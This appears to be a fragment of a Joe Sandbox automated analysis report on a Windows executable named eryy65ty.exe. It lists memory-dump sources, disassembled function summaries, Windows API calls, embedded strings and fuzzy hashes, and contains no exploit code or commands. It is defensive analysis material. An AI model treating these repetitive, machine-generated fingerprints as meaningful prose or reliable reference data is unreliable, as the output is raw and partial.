                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 3033488037-0
                                                                                                      • Opcode ID: 9bf4e4224d05a1970d8bee42206766a260d41200a5c8d9059a389652696decf9
                                                                                                      • Instruction ID: 928759d4499ace2dc3371ec4cf69eecac1749d29fed4eac492dd715f6de882a9
                                                                                                      • Opcode Fuzzy Hash: 9bf4e4224d05a1970d8bee42206766a260d41200a5c8d9059a389652696decf9
                                                                                                      • Instruction Fuzzy Hash: A751C171A00309AFDB20DF29CD42A6A77F4EF5E324B14156DEA09FB250E735E905CB80
                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00EAB678
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EAB69B
                                                                                                        • Part of subcall function 00EA6049: RtlAllocateHeap.NTDLL(00000000,?,00000011,?,00E8EE48,00000000,00000011,00000001,?), ref: 00EA607B
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00EAB6C1
                                                                                                      • _free.LIBCMT ref: 00EAB6D4
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EAB6E3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 336800556-0
                                                                                                      • Opcode ID: 60993dc3b7e6dbd22e9f82fa2c9f75899b4eff5ffdff6b4b457a867a8051123e
                                                                                                      • Instruction ID: 82aefa3709696cf9e754a5c0f62c6e90c83e387fda633193bbd4b0994c532bf2
                                                                                                      • Opcode Fuzzy Hash: 60993dc3b7e6dbd22e9f82fa2c9f75899b4eff5ffdff6b4b457a867a8051123e
                                                                                                      • Instruction Fuzzy Hash: BE01D472601619BF27312AA75C8CCBB6A6CDFCBBA53140229F904EE142EBA09C0191B0
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(-00000004,?,AB1AAB9C,00E9CA42,00EA466C,?,?,00EA1489), ref: 00EA4552
                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,AB1AAB9C,00E9CA42,00EA466C,?,?,00EA1489), ref: 00EA4578
                                                                                                      • _free.LIBCMT ref: 00EA45B8
                                                                                                      • _free.LIBCMT ref: 00EA45EB
                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00EA45F8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3170660625-0
                                                                                                      • Opcode ID: c8cbd1bc9c11c2405425a224f9bb780f17680f42f2d7d32bbfcdd136eda3b3c1
                                                                                                      • Instruction ID: bf9a941ac81a6e5dd372db493b1ca712242f1ead974319c16ee531e006d17de9
                                                                                                      • Opcode Fuzzy Hash: c8cbd1bc9c11c2405425a224f9bb780f17680f42f2d7d32bbfcdd136eda3b3c1
                                                                                                      • Instruction Fuzzy Hash: 0411A5F29016046F9B1163397C8592B659D9BCB7B5B252724F424BE1E1EFF0BD095120
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,00E98DBE,00EE40B0,00000010), ref: 00EA4403
                                                                                                      • _free.LIBCMT ref: 00EA445A
                                                                                                      • _free.LIBCMT ref: 00EA448E
                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00EA449B
                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E98DBE,00EE40B0,00000010), ref: 00EA44A7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3170660625-0
                                                                                                      • Opcode ID: e282b3f9b83e4d6d88e868ba53de53c3e8dbcf6e1c85132904c09831c77a16ec
                                                                                                      • Instruction ID: e6af1c9fc60631e90862b0eb9c89e079642d610cdf1cb746b560736661f13fcb
                                                                                                      • Opcode Fuzzy Hash: e282b3f9b83e4d6d88e868ba53de53c3e8dbcf6e1c85132904c09831c77a16ec
                                                                                                      • Instruction Fuzzy Hash: 0811A5F15016146EEF116725AC46F6E219D9BCF775B252324F434BE1E1EBF0AC095121
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 00EAC580
                                                                                                        • Part of subcall function 00EA4646: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1489), ref: 00EA465C
                                                                                                        • Part of subcall function 00EA4646: GetLastError.KERNEL32(?,?,00EA1489), ref: 00EA466E
                                                                                                      • _free.LIBCMT ref: 00EAC592
                                                                                                      • _free.LIBCMT ref: 00EAC5A4
                                                                                                      • _free.LIBCMT ref: 00EAC5B6
                                                                                                      • _free.LIBCMT ref: 00EAC5C8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: d1651f78c759ad42657804485a0c290ce099eb1238bc22bdd7968743f42bacd8
                                                                                                      • Instruction ID: 4f389ed46dff01f82ac573259d3fb16a860360c5b62b8c53b33a29cf541f4f64
                                                                                                      • Opcode Fuzzy Hash: d1651f78c759ad42657804485a0c290ce099eb1238bc22bdd7968743f42bacd8
                                                                                                      • Instruction Fuzzy Hash: 2DF09672904648AF8A30EB55F9C5C0A77D9AB9F3547742809F105FF6A0CB74FC808A98
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                      • API String ID: 0-2350925339
                                                                                                      • Opcode ID: ae1c2ecf158940447702c847b417a89d1f391121161c5ad4828831a6c3d99a2a
                                                                                                      • Instruction ID: bb2db11266905b7a83fdf6f6b15abfecffee0166e770b54b3307757602ab9017
                                                                                                      • Opcode Fuzzy Hash: ae1c2ecf158940447702c847b417a89d1f391121161c5ad4828831a6c3d99a2a
                                                                                                      • Instruction Fuzzy Hash: 00417371A04258AFDB21EF99DC819AEBBF8EB8E310F105166F404BB211D7716E45CB50
                                                                                                      APIs
                                                                                                      • Replicator::operator[].LIBVCRUNTIME ref: 00E9348B
                                                                                                      • DName::operator=.LIBVCRUNTIME ref: 00E93520
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Name::operator=Replicator::operator[]
                                                                                                      • String ID: V5$V5
                                                                                                      • API String ID: 3211817929-1174787237
                                                                                                      • Opcode ID: a7b636a1b517179abee22707ceaf1a3fc781b4c3f02347204edcd6acdde99b41
                                                                                                      • Instruction ID: 106b0574a5ee8fa0c31abab2d8588b9d43dd1b3dd746069bcf15df523043ba39
                                                                                                      • Opcode Fuzzy Hash: a7b636a1b517179abee22707ceaf1a3fc781b4c3f02347204edcd6acdde99b41
                                                                                                      • Instruction Fuzzy Hash: D33189B16043489FDF21CBB4D8857BE73E9EB04719F04280EE162BB182D7B49A44C740
                                                                                                      APIs
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E3237F
                                                                                                        • Part of subcall function 00E8F18A: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00E49A0A,?,00E8C15E,?,00EE3CB4,?,?,?,?,00E49A0A,AllocatorBase: requested size would cause integer overflow,AB1AAB9C), ref: 00E8F1EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise___std_exception_copy
                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                      • API String ID: 3109751735-1866435925
                                                                                                      • Opcode ID: 0ec6be2d99f94e0882bb0021605c7419db4218e14c30f99f6803ff1cec1b9466
                                                                                                      • Instruction ID: c0f570da63c2af2008e795776d1e3d314be7bad9244ae223855086e67e3b75ed
                                                                                                      • Opcode Fuzzy Hash: 0ec6be2d99f94e0882bb0021605c7419db4218e14c30f99f6803ff1cec1b9466
                                                                                                      • Instruction Fuzzy Hash: 2A1127B2900305BBC710EF68C806BD6B7D8EF55310F14956AFA98BB281F770A914CBA1
                                                                                                      APIs
                                                                                                      • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00E8FD57
                                                                                                      • PMDtoOffset.LIBCMT ref: 00E8FD7D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FindInstanceOffsetTargetType
                                                                                                      • String ID: Bad dynamic_cast!
                                                                                                      • API String ID: 2363274979-2956939130
                                                                                                      • Opcode ID: cdcbe78dad434bc40e1529ea83d8fda0b677d78884973a8ca2dddc29794f4ca4
                                                                                                      • Instruction ID: b11ff972cb5f9614b342b61534cad17316c2eeef0f8cd5b4f58c577bcdbdc1f1
                                                                                                      • Opcode Fuzzy Hash: cdcbe78dad434bc40e1529ea83d8fda0b677d78884973a8ca2dddc29794f4ca4
                                                                                                      • Instruction Fuzzy Hash: D021F972A00205AFCF18FFA4CE06BA977A4FB54724F209679EA1DB76C0D731E9018791
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 3213747228-0
                                                                                                      • Opcode ID: 117e2bce455ad277bec5b8e57081e36723839e66c64098f01fbd1d0ff68ebf4a
                                                                                                      • Instruction ID: 7c8f47c9e1e210380231c4ffddc1b95e862af11028d5faeb217f45d97d7babd2
                                                                                                      • Opcode Fuzzy Hash: 117e2bce455ad277bec5b8e57081e36723839e66c64098f01fbd1d0ff68ebf4a
                                                                                                      • Instruction Fuzzy Hash: 6FB123719002569FDB118F18C881BAEBBB5FF9B314F2951A9E544BF281D634E941CB90
                                                                                                      APIs
                                                                                                      • __EH_prolog3.LIBCMT ref: 00E94766
                                                                                                      • UnDecorator::getSymbolName.LIBCMT ref: 00E947F4
                                                                                                      • DName::operator+.LIBCMT ref: 00E948F8
                                                                                                        • Part of subcall function 00E92444: shared_ptr.LIBCMT ref: 00E92460
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E949B5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Name$Decorator::getH_prolog3Name::Name::operator+Symbolshared_ptr
                                                                                                      • String ID:
                                                                                                      • API String ID: 334624791-0
                                                                                                      • Opcode ID: 46098a534928f66a5283b9b6b8ddaa9c24ec631872e56a5c5bf6b2e3bad995e7
                                                                                                      • Instruction ID: 80425f2721c4b3c1cd0a310eaf5d35f5ce1ed74f583fbf1cee84790ba9c935c1
                                                                                                      • Opcode Fuzzy Hash: 46098a534928f66a5283b9b6b8ddaa9c24ec631872e56a5c5bf6b2e3bad995e7
                                                                                                      • Instruction Fuzzy Hash: 27819AB1D0424A9FDF15CF94D880EEEBBF4FB08314F14605AE915BB292E7309946CBA0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID:
                                                                                                      • API String ID: 269201875-0
                                                                                                      • Opcode ID: 72ce46b5a8f187678b56e0c92ba54a366f0a43cdba24351086ffa4bba0802086
                                                                                                      • Instruction ID: 2021f2edfe1dff5faa57311ec43c0ba3ce03b794825dc89ea1b6b8599347d93c
                                                                                                      • Opcode Fuzzy Hash: 72ce46b5a8f187678b56e0c92ba54a366f0a43cdba24351086ffa4bba0802086
                                                                                                      • Instruction Fuzzy Hash: DC414B31A01105ABDB25BE7C8C42AFF3AE4EF46370F24261DFB29FA191DA744D425762
                                                                                                      APIs
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E94E89
                                                                                                        • Part of subcall function 00E921B4: __aulldvrm.LIBCMT ref: 00E921E5
                                                                                                      • DName::operator+.LIBCMT ref: 00E94E96
                                                                                                      • DName::operator=.LIBVCRUNTIME ref: 00E94F16
                                                                                                      • DName::DName.LIBVCRUNTIME ref: 00E94F36
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NameName::$Name::operator+Name::operator=__aulldvrm
                                                                                                      • String ID:
                                                                                                      • API String ID: 2448499823-0
                                                                                                      • Opcode ID: 15105ef92b07702bfa1a3f9ebac4d393f1c038dccadfb34ffee893a5792ea078
                                                                                                      • Instruction ID: 441388dd430aea42cd6b4aa437c6840e4a7750169f5f925f17c1e44f3b23b2da
                                                                                                      • Opcode Fuzzy Hash: 15105ef92b07702bfa1a3f9ebac4d393f1c038dccadfb34ffee893a5792ea078
                                                                                                      • Instruction Fuzzy Hash: C7517CB0A0425AEFCF15CF58D980EEEBBB5FB45304F04A19AE511BB391D7709A46CB90
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,0000007F,00ECA8C8,00000000,00000000,3FFFFFFF,?,?,00000004,00000000,00000001,00ECA8C8,0000007F,?,3FFFFFFF), ref: 00EA92A9
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 00EA931E
                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00EA9330
                                                                                                      • __freea.LIBCMT ref: 00EA9339
                                                                                                        • Part of subcall function 00EA6049: RtlAllocateHeap.NTDLL(00000000,?,00000011,?,00E8EE48,00000000,00000011,00000001,?), ref: 00EA607B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                      • String ID:
                                                                                                      • API String ID: 2652629310-0
                                                                                                      • Opcode ID: 4343fb5944fb63eae1ed0a675048f55c1cd46d4b3dac8074d432c3e7d35ea457
                                                                                                      • Instruction ID: 10a17d6adfffbba71eaa01297d4ee5da7d030319ce2f839f3ae3901b5d4a56e1
                                                                                                      • Opcode Fuzzy Hash: 4343fb5944fb63eae1ed0a675048f55c1cd46d4b3dac8074d432c3e7d35ea457
                                                                                                      • Instruction Fuzzy Hash: C931BE7190121AABDF209FA5DC84EAF7BB9EB4A714F054128F808BA262D7309854C7A0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 99ef30cb182649d994a9d10062b6604ab13951050c5cff18cc7dda3cdf1b53cc
                                                                                                      • Instruction ID: 2c1b38ef683db494024f8412957b99821ca5708e31a3968129ba9c41ac616471
                                                                                                      • Opcode Fuzzy Hash: 99ef30cb182649d994a9d10062b6604ab13951050c5cff18cc7dda3cdf1b53cc
                                                                                                      • Instruction Fuzzy Hash: 1101A2B220925A7EE62026B96CC1F6B368CDF8B3B8F312765F1217D1D1DBB1AC844160
                                                                                                      APIs
                                                                                                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00EAE9A7,00000000,00000001,00000000,00000000,?,00EA552F,00000000,00000010,00000000), ref: 00EB1CC8
                                                                                                      • GetLastError.KERNEL32(?,00EAE9A7,00000000,00000001,00000000,00000000,?,00EA552F,00000000,00000010,00000000,00000000,00000000,?,00EA5AAE,00000000), ref: 00EB1CD4
                                                                                                        • Part of subcall function 00EB1C9A: CloseHandle.KERNEL32(FFFFFFFE,00EB1CE4,?,00EAE9A7,00000000,00000001,00000000,00000000,?,00EA552F,00000000,00000010,00000000,00000000,00000000), ref: 00EB1CAA
                                                                                                      • ___initconout.LIBCMT ref: 00EB1CE4
